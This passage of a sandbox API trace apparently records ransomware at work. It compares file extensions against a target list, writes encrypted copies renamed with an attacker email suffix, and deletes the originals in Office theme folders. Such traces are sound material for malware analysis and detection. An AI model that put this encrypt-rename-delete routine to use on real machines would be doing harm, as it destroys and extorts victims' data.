[0046.035] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.035] lstrlenW (lpString=".xlsx") returned 5 [0046.035] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.035] lstrlenW (lpString=".ppt") returned 4 [0046.035] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.035] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75 [0046.035] lstrlenW (lpString=".zip") returned 4 [0046.035] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.035] lstrlenW (lpString=".rar") returned 4 [0046.035] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.035] lstrlenW (lpString=".bz2") returned 4 [0046.035] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.035] lstrlenW (lpString=".7z") returned 3 [0046.035] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.035] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75 [0046.035] lstrlenW (lpString=".dbf") returned 4 [0046.035] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.035] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75 [0046.035] lstrlenW (lpString=".1cd") returned 4 [0046.035] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.036] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75 [0046.036] lstrlenW (lpString=".jpg") returned 4 [0046.036] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.036] lstrcmpiW (lpString1=".GIF", lpString2=".USA") returned -1 [0046.036] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0046.036] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0046.036] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=1347) returned 1 [0046.036] CloseHandle (hObject=0x20c) returned 1 [0046.036] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\preview.gif")) returned 0x20 [0046.036] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0046.036] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0046.036] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0046.036] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0046.037] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0046.285] GetLastError () returned 0x0 [0046.285] ReadFile (in: hFile=0x20c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x543, lpOverlapped=0x0) returned 1 [0046.288] WriteFile (in: hFile=0x200, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x550, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x550, lpOverlapped=0x0) returned 1 [0046.289] ReadFile (in: hFile=0x20c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0046.289] WriteFile (in: hFile=0x200, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xea, lpOverlapped=0x0) returned 1 [0046.289] SetEndOfFile (hFile=0x200) returned 1 [0046.289] CloseHandle (hObject=0x200) returned 1 [0046.289] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0046.289] SetEndOfFile (hFile=0x20c) returned 1 [0046.290] CloseHandle (hObject=0x20c) returned 1 [0046.290] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0046.290] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\preview.gif")) returned 1 [0046.290] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72 [0046.290] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72 [0046.290] lstrlenW (lpString=".doc") returned 4 [0046.290] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.290] lstrlenW (lpString=".docx") returned 5 [0046.290] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.290] lstrlenW (lpString=".pdf") returned 4 [0046.290] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.290] lstrlenW (lpString=".xls") returned 4 [0046.290] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.290] lstrlenW (lpString=".xlsx") returned 5 [0046.290] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.290] lstrlenW (lpString=".ppt") returned 4 [0046.290] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.290] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72 [0046.290] lstrlenW (lpString=".zip") returned 4 [0046.291] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.291] lstrlenW (lpString=".rar") returned 4 [0046.291] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.291] lstrlenW (lpString=".bz2") returned 4 [0046.291] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.291] lstrlenW (lpString=".7z") returned 3 [0046.291] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.291] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72 [0046.291] lstrlenW (lpString=".dbf") returned 4 [0046.291] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.291] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72 [0046.291] lstrlenW (lpString=".1cd") returned 4 [0046.291] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.291] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72 [0046.291] lstrlenW (lpString=".jpg") returned 4 [0046.291] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.291] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72 [0046.291] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72 [0046.291] lstrlenW (lpString=".doc") returned 4 [0046.291] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.291] lstrlenW (lpString=".docx") returned 5 [0046.291] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.291] lstrlenW (lpString=".pdf") returned 4 [0046.291] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.291] lstrlenW (lpString=".xls") returned 4 [0046.291] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.291] lstrlenW (lpString=".xlsx") returned 5 [0046.291] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.291] lstrlenW (lpString=".ppt") returned 4 [0046.291] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.291] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72 [0046.291] lstrlenW (lpString=".zip") returned 4 [0046.291] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.291] lstrlenW (lpString=".rar") returned 4 [0046.291] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.291] lstrlenW (lpString=".bz2") returned 4 [0046.292] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.292] lstrlenW (lpString=".7z") returned 3 [0046.292] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.292] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72 [0046.292] lstrlenW (lpString=".dbf") returned 4 [0046.292] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.292] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72 [0046.292] lstrlenW (lpString=".1cd") returned 4 [0046.292] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.292] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72 [0046.292] lstrlenW (lpString=".jpg") returned 4 [0046.292] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.292] lstrcmpiW (lpString1=".GIF", lpString2=".USA") returned -1 [0046.292] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0046.292] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0046.292] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=5179) returned 1 [0046.293] CloseHandle (hObject=0x20c) returned 1 [0046.293] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\preview.gif")) returned 0x20 [0046.293] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0046.293] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0046.293] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0046.293] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0046.293] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0046.294] GetLastError () returned 0x0 [0046.295] ReadFile (in: hFile=0x20c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x143b, lpOverlapped=0x0) returned 1 [0046.296] WriteFile (in: hFile=0x200, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x1440, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x1440, lpOverlapped=0x0) returned 1 [0046.299] ReadFile (in: hFile=0x20c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0046.299] WriteFile (in: hFile=0x200, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xea, lpOverlapped=0x0) returned 1 [0046.299] SetEndOfFile (hFile=0x200) returned 1 [0046.299] CloseHandle (hObject=0x200) returned 1 [0046.299] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0046.300] SetEndOfFile (hFile=0x20c) returned 1 [0046.300] CloseHandle (hObject=0x20c) returned 1 [0046.300] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0046.301] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\preview.gif")) returned 1 [0046.301] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74 [0046.301] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74 [0046.301] lstrlenW (lpString=".doc") returned 4 [0046.301] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.301] lstrlenW (lpString=".docx") returned 5 [0046.301] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.301] lstrlenW (lpString=".pdf") returned 4 [0046.301] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.301] lstrlenW (lpString=".xls") returned 4 [0046.301] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.301] lstrlenW (lpString=".xlsx") returned 5 [0046.301] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.301] lstrlenW (lpString=".ppt") returned 4 [0046.301] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.301] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74 [0046.301] lstrlenW (lpString=".zip") returned 4 [0046.301] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.301] lstrlenW (lpString=".rar") returned 4 [0046.301] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.301] lstrlenW (lpString=".bz2") returned 4 [0046.301] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.302] lstrlenW (lpString=".7z") returned 3 [0046.302] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.302] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74 [0046.302] lstrlenW (lpString=".dbf") returned 4 [0046.302] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.302] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74 [0046.302] lstrlenW (lpString=".1cd") returned 4 [0046.302] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.302] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74 [0046.302] lstrlenW (lpString=".jpg") returned 4 [0046.302] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.302] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74 [0046.302] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74 [0046.302] lstrlenW (lpString=".doc") returned 4 [0046.302] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.302] lstrlenW (lpString=".docx") returned 5 [0046.302] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.302] lstrlenW (lpString=".pdf") returned 4 [0046.302] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.302] lstrlenW (lpString=".xls") returned 4 [0046.302] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.302] lstrlenW (lpString=".xlsx") returned 5 [0046.302] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.302] lstrlenW (lpString=".ppt") returned 4 [0046.302] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.302] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74 [0046.302] lstrlenW (lpString=".zip") returned 4 [0046.302] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.302] lstrlenW (lpString=".rar") returned 4 [0046.302] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.302] lstrlenW (lpString=".bz2") returned 4 [0046.302] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.302] lstrlenW (lpString=".7z") returned 3 [0046.302] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.302] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74 [0046.303] lstrlenW (lpString=".dbf") returned 4 [0046.303] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.303] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74 [0046.303] lstrlenW (lpString=".1cd") returned 4 [0046.303] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.303] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74 [0046.303] lstrlenW (lpString=".jpg") returned 4 [0046.303] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.303] lstrcmpiW (lpString1=".PNG", lpString2=".USA") returned -1 [0046.303] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0046.303] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0046.303] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=33559) returned 1 [0046.303] CloseHandle (hObject=0x20c) returned 1 [0046.303] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\thmbnail.png")) returned 0x20 [0046.303] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0046.303] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0046.304] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0046.304] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0046.304] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0046.304] GetLastError () returned 0x0 [0046.304] ReadFile (in: hFile=0x20c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x8317, lpOverlapped=0x0) returned 1 [0046.551] WriteFile (in: hFile=0x200, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x8320, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x8320, lpOverlapped=0x0) returned 1 [0046.553] ReadFile (in: hFile=0x20c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0046.553] WriteFile (in: hFile=0x200, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xec, lpOverlapped=0x0) returned 1 [0046.553] SetEndOfFile (hFile=0x200) returned 1 [0046.553] CloseHandle (hObject=0x200) returned 1 [0046.553] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0046.553] SetEndOfFile (hFile=0x20c) returned 1 [0046.555] CloseHandle (hObject=0x20c) returned 1 [0046.555] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0046.555] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\thmbnail.png")) returned 1 [0046.555] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75 [0046.555] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75 [0046.555] lstrlenW (lpString=".doc") returned 4 [0046.555] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.555] lstrlenW (lpString=".docx") returned 5 [0046.556] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.556] lstrlenW (lpString=".pdf") returned 4 [0046.556] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.556] lstrlenW (lpString=".xls") returned 4 [0046.556] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.556] lstrlenW (lpString=".xlsx") returned 5 [0046.556] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.556] lstrlenW (lpString=".ppt") returned 4 [0046.556] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.556] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75 [0046.556] lstrlenW (lpString=".zip") returned 4 [0046.556] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.556] lstrlenW (lpString=".rar") returned 4 [0046.556] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.556] lstrlenW (lpString=".bz2") returned 4 [0046.556] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.556] lstrlenW (lpString=".7z") returned 3 [0046.556] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.556] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75 [0046.556] lstrlenW (lpString=".dbf") returned 4 [0046.556] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.556] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75 [0046.556] lstrlenW (lpString=".1cd") returned 4 [0046.556] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.556] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75 [0046.556] lstrlenW (lpString=".jpg") returned 4 [0046.556] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.556] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75 [0046.556] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75 [0046.556] lstrlenW (lpString=".doc") returned 4 [0046.556] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.556] lstrlenW (lpString=".docx") returned 5 [0046.556] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.556] lstrlenW (lpString=".pdf") returned 4 [0046.556] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.557] lstrlenW (lpString=".xls") returned 4 [0046.557] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.557] lstrlenW (lpString=".xlsx") returned 5 [0046.557] 